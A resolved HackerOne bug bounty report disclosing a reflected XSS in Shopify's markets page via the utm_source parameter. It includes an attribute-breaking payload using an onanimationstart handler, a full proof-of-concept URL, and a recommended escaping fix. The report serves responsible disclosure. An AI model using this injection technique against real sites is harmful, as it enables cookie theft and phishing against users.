XSS in www.shopify.com/markets?utm_source=
Low
Vulnerability Details
Hello, hope you are having a good day :)
## Summary:
I found a reflected XSS in `www.shopify.com/markets` using the `utm_source` parameter
Reflected XSS vulnerabilities arise when the application accepts a malicious input script from a user and then it is executed in the victim's browser. Since the XSS is reflected, the attacker has to trick the victim into executing the payload, usually using another website or by sending a specially crafted link
##### URL: `https://www.shopify.com/markets`
##### INJECTION POINT: `utm_source` parameter
##### PAYLOAD: `injection%22%20style=%22animation-name:swoop-up%22%20onanimationstart=%22alert(document.domain)`
## Steps To Reproduce:
Visit this URL:
```
https://www.shopify.com/markets?utm_source=INJECTION%22%20style=%22animation-name:swoop-up%22%20onanimationstart=%22alert(document.domain)
```
By visiting that link you'll get an alert on your screen, that demonstrates the existence of the vulnerability.
{F1925617}
The attack is unauthenticated
## Recommended Fix
Correctly escape special characters such as `<` `>` `"` `'` based on the context where the string gets reflected.
Thank you.
## Impact
An attacker could steal user cookies, create a trusted phishing page or bypass any CSRF protection mechanism.
Actions
View on HackerOneReport Stats
- Report ID: 1699762
- State: Closed
- Substate: resolved
- Upvotes: 148